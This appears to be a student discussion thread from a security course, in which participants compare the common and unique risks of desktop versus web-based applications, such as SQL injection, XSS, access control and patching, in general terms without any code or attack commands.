A web application is primarily a software being kept on a remote server and run on a web browser. A desktop application is simply a stand alone software that is being installed on a computer. There are several risks that could happen on both a web-based application and desktop application. Easy access can be obtained between a desktop and web applications. Users can therefore access web applications from any device at all. As matter of fact, desktop application security risk could not have a strong communication or an improper authorization such as a least privilege approach. Web applications such as injection flaws, broken authentication, SQL injection, security misconfiguration are risk. organizations’ applications are deemed to be at a higher risk though firewalls are providing security,
Ryan Trapp says
Kofi,
It is true that web applications can be more difficult to manage due to the larger attack surface. And you are certainly correct that the easy access makes web applications potentially more enticing for company’s to develop. The decision needs to be made whether the ubiquity is worth the increased security risk.
Olayinka Lucas says
Hello Kofi, I agree with your position that “Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes.” Access to the internet only creates more vulnerabilities to be compromised by Adversaries on the web. However, the onus is on the process owners to ensure that adequate controls are in place to mitigate any attacks that may arise from internet-related activities. Weel said.
Michael Duffy says
Both web-based and desktop applications are susceptible to traditional attacks through access control; and injection attacks if neither program has input validation allowing hackers to exploit syntax errors from either program. Where the two differentiate from each other is convenience and the scope of the security varies between vendors. Web-applications also introduce more exploits such as Buffer Overflow, XML Injection, and SQL injection attacks. And although web-based applications are cross-platform and provide a very easy and convenient way for the end user to access the application – it should be noted that platform security is dependent on the vendor that manages the application. Technically, desktop applications can come with similar risks depending on the scope of the system. Since developers sometimes utilize embedded SQL servers within desktop applications depending on the system, but many desktop applications do not require an internet connection which means access is local rather than over the web.
Olayinka Lucas says
Web-based applications are programs you access online delivered to your device from a remote server when you access it via a browser; it is not installed on your machine. On the other hand, Desktop applications are the programs that you download and install on your device. They do not need internet connectivity to be used. Every required functionality is stored on the workstation with little no reference to the internet except for connectivity. So, the application can be accessed through your desktop.
The common risk they both face is XSS(Cross-Site Scripting) and other malicious attacks that may compromise access to the application.
Web-based applications are the more modern method of delivering applications, while Desktop applications are more traditional.
Web applications are at higher security risks as they are inherently designed to increase accessibility. On the other hand, desktop applications have the better authorization, and administrators have better control, hence more secure. In addition, web applications rely heavily on internet connectivity for their operation, while desktop applications rely solely on user access.
Everything on the internet is more vulnerable to hackers than information left on a device, i.e., cloud storage, for example, is deployed either in the form of SAAS, IAAS or PAAS by the Cloud Service Provider(CSP) without client input. In contrast, desktop storage is solely reliant on the capability of the Data Owner and not the service provider.
Richard Hertz says
• What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Cross-site scripting and SQL injection attacks are common risks in both desktop and web based apps. The 2 applications differ in their construct (browser based vs executing 100% on your local compute platform), but share the vulnerabilities of connecting to and querying back end systems.
The different vulnerabilities come from the different locations where functions are executed in desktop vs web based. The desktop apps are also vulnerable to a host of attacks that can be launched from the local compute platform. Web based apps then to be browser based and are more vulnerable to web server based attacks.
Antonio Cozza says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
The most obvious shared risk between desktop and web-based applications is that of access control flaws. Although it is a more general issue with different implications based on the type of access flaw, it is prevalent and poses a significant risk in both type of applications on a large scale. SQL Injection and XSS are primary risks that even make it to the OWASP top 10 list of common web app vulnerabilities. On the other hand, desktop applications are quite susceptible to process hijacking and then privilege escalation or pivoting.
Corey Arana says
Hey Antonio,
Thanks for sharing, the OWASP list is a good piece of information. SQL is definitely a serious risk for the web based apps.
Do you happen to have any examples of a desktop application being hijacked?
Bryan Garrahan says
Desktop and web based applications are subject to both authentication and access control risks since both need to configured to ensure only appropriate users maintain access to the application and each can only perform functions they are required to perform. Some of the more common desktop application risks include malware/viruses, which can be developed take advantage of a flaw in the design/configuration of the application can be propagated across other clients in the network. Web based applications are typically more vulnerable to remote attacks, such as cross site scripting (XXS) and SQL injection.
Vraj Patel says
Hello Bryan,
That’s a good explanation of the difference between the web and desktop application. I do agree that the web application are vulnerable to cross site scripting (XXS) and SQL injection. However, the malware and virus are also a risk to the web application as well along with the desktop application.
Lauren Deinhardt says
Hi Bryan. Great analysis! I would also argue that SQL injections could impact on-prem applications if the SQL database connects with any web server based databases (same with XML attacks).
Vraj Patel says
The common risk that both desktop applications and web-based applications has is maintaining the application itself. If the application is not patch on time, then it would be vulnerable to the vulnerability that the current version might have. The risk that desktop applications has is they are limited by the hardware resources. If the resource of the application is installed is not meeting the performance level which is accepted by the business, then they might be required to be replaced. Another risk with the desktop application is it require to get installed to the desktop by the user. If the application is installed by the user has malware in it then it could introduce the risk within the companies’ network. The risk with the web-based application is that the user has to have a good internet connection. They also need to be properly configured as it could be accessible by anyone on internet.
Kelly Sharadin says
Hi Vraj,
Fanstatic post, you did a far better job than me explaining the ease in which an attacker can execute a web-based attack by simply having an internet connection. I agree that desktop apps require an additional level of privilege esc inorder to cause considerable damage.
Kelly
Lauren Deinhardt says
Both desktop applications and web based applications are vulnerable to many application-based risks. Web based applications are highly privy to buffer overflow attacks, which can lead into DDOS (distributed denial of service) attacks or even malware injections. Due to the on-prem nature of desktop applications (ie calculator), this attack can generally be avoided; but when a desktop application connects with web-based servers, the possibility for a buffer overflow attack is resurfaced. SQL injections can impact both desktop and web based applications; the internet is not always required to use MySQL (or other SQL programs for example), so an attacker can commit a SQL injection on either type of application. A unique risk experienced by web based applications, however, is XML injection attacks. XML is the exclusive metalanguage used by the internet and is the backbone of web servers. If an XML injection attack were to be successful, this can compromise an entire web based application or even web based database—this would not have the same impacts on a desktop server though.
Michael Duffy says
I actually didn’t think about that about XML when I was making my comment. I wish I actually stated that instead of my other points I made. Anyhow; I like that you pointed out that SQL is sometimes used by desktop applications. I know a lot of developers will embed SQL into the applications to function as servers for a LAN.
Jason Burwell says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Both desktop applications and web based applications have the challenge of being maintained, the risk of unwanted access and security risks.
Some differences are:
Web Based- No need to install, not user dependent for updates, Easy access, can be accessed from mobile device, more security risks due to internet exposure,
Application Based- Does not rely on the internet, stronger privacy and data protection due to not being internet dependent, more hardware dependent as it is needs computer resources to run but usually runs faster than web based because of this, unable to be accessed from as many devices as web based
Madalyn Stiverson says
Desktop application cons
* Desktop apps may be harder to scale when compared to cloud-based alternatives
* There is a lack of communication between computers. Changes you made locally may not reflect on another user’s machine. Meaning collaboration is also more difficult on desktop apps. Users may share files via email or USB, creating a potential security vulnerability.
Web app cons
* You must be connected to the internet, leaving you vulnerable to internet-based attacks. Whereas with desktop apps, you have the opportunity to air gap
* Availability is limited to the service availability. For example, if AWS has an outage, there’s not much you personally can do to get it back up and running
* There are more potential points of failure. Desktop apps only rely on your computer speed, whereas web apps can be affected by server speed and internet speed.
* For desktop apps, you have the opportunity to pursue your own backup solution. However, with web apps you may be forced to use a certain backup solution that’s compatible or supported by that web app.
* For desktop apps, there is no question of ownership. The person on that local computer made that change in the app. However, web app data is not stored locally, but sent to a cloud, so there may be a question of ownership regarding changes or updates to the data.
* Web apps may have an automatic update system in place, which could potentially break compatibility or functionality.
Risks for both
* Security updates are a concern, since not all applications will be supported indefinitely; most applications will hit end of life.
Alexander William Knoll says
Desktop applications & web-based applications have several shared risks, such as poor authentication measures and weak passwords. Regardless of how the application is accessed, weak passwords can be broken if the data is highly desired, and so back-up measures such as two-factor authentication should always be in place. A unique risk that desktop applications face is their high vulnerability to malware invading the system the application is installed on. If a person downloads an untrustworthy application, they may be allowing something onto their computer that can quickly spread across the system & network. Another risk is the application being locked onto a particular device. For example, if you leave work for the day and forget to lock your computer, you are openly leaving all of the information on a specific desktop application open to whoever. On the other hand, web-based applications have their own unique risks, such as SQL Injection & Cross-site scripting. SQL Injection works when an attacker includes SQL query into an input channel on an application that the user then accesses. Once the malicious SQL query is validated, the attacker is able to access/manipulate database information, such as sensitive company data. Cross-site scripting (XSS) works by exploiting an application with a client-side text string containing malicious JavaScript to a user’s browser, which can have several consequences such as redirecting the user to a malicious website or stealing sensitive cookie information.
Corey Arana says
People are the shared risk that both desktop apps and web apps have in common. Because of people, web apps and desktop apps are at risk due being connected to the internet. Authentication, authorization, exposure of sensitive data and injections are all risks that come with being connected to the internet. Web applications are more at risk than desktop apps in today’s world. Web applications face risks such as login/password theft, security misconfiguration and cross site scripting. Desktops do have risks such as virus’s and malware but are less risky because they do not require the internet to run.
Bryan Garrahan says
I hadn’t considered human risk even though we have discussed various ways humans introduce IT security risk across several units. It’s a great point and I think with the existence and popularity of cloud based services humans are much more vulnerable to web application rather than desktop application risks.
Bernard Antwi says
Desktop application is a type of software that you install directly on your personal computer. You can launch it whenever you want independently of other applications. They take up space of your hard drive and can work regardless of internet connection. Although some apps need it to function as intended (web browsers like Chrome or Firefox, for example) they are still considered desktop apps since they are installed on your PC whereas web-based application is a type of software application is used through the internet via a web browser. Instead of storing the files on your computer, they are located on a remote server. A web browser allows you to access the app and its content and also runs all the scripts responsible for its features. What differentiates a simple static web page from the web application is interactivity. They often allow you to create, edit, or manipulate data and content.
https://digitalskynet.com/blog/Desktop-App-vs-Web-App-Comparative-Analysis